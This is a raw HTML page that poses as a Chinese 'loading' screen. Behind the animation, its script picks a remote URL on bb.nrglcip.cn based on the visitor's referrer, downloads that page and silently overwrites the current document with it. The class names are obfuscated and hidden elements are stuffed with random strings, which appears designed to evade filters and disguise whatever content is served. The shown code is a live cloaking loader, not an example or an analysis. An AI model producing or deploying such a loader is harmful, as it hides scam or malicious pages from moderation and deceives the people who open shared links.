<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .woQ6rUN {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .woQ6rUN .J2s7UWk {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .woQ6rUN .content {
            line-height: 50px;
            text-align: center
        }

        .woQ6rUN .img {
            width: 100%
        }

        .woQ6rUN .ZCDpi6XwuM1 {
            text-align: center
        }

        .woQ6rUN .ZCDpi6XwuM1 span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .woQ6rUN .ZCDpi6XwuM1 span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .woQ6rUN .ZCDpi6XwuM1 span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .woQ6rUN .ZCDpi6XwuM1 span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .woQ6rUN .ZCDpi6XwuM1 span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .woQ6rUN .ZCDpi6XwuM1 span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .woQ6rUN .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function ZxCw0lQci8(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var JHMuH = ZxCw0lQci8('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ JHMuH +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ JHMuH +".html?a=share";
		}
		
        uZ7Vhu=url+"#"+new Date().getTime();
        uZ7Vhu && function() {
            $.get(uZ7Vhu, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<span style='display:none'>ndMr7SBu4D44QzEBtm72ojrh2vMARa6LZUuwsMLYA4rXbhf8BTAARvmiB3hviaWqReP3ZR</span>
<span style='display:none'>ndMr7SBu4D44QzEBtm72ojrh2vMARa6LZUuwsMLYA4rXbhf8BTAARvmiB3hviaWqReP3ZR</span>
<b style='display:none' >lmiFvWAgbYJCYE7SDt9eNiE5blFjpzgLv1jUMVRhiV3szukc1i9mjTVLiYYftIx4gL429QjGgMDq9IPBj6pqQq6e0mAPJwGboiekq</b><div class="woQ6rUN">
    <div class="J2s7UWk">
        <div class="ZCDpi6XwuM1">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<span style='display:none'>TvSK9toXtUyV0qBwwu</span>
<img  src='' style='display:none'>
<a  href='#' style='display:none'>U7maOp7cRwnc706bH25C6XPyJ95CCbKPgqebaGc0YSvvKgvVsL4K7z3xJ143DsjzMmfb2lbdjZpJrxcAeg</a>
<li style='display:none' >shqRk9TvD5MNi7XyRELUSf0UknqKrq4zz9ImecA8qxOttuIJ1Hu1H0yLzEWzXR0VliyvSYWVgxyozZ</li>
<a  href='#' style='display:none'>U7maOp7cRwnc706bH25C6XPyJ95CCbKPgqebaGc0YSvvKgvVsL4K7z3xJ143DsjzMmfb2lbdjZpJrxcAeg</a>
<p  style='display:none'>aRXJGOHtRKwtCKEhfOrJTfdy05</p></body>
</html>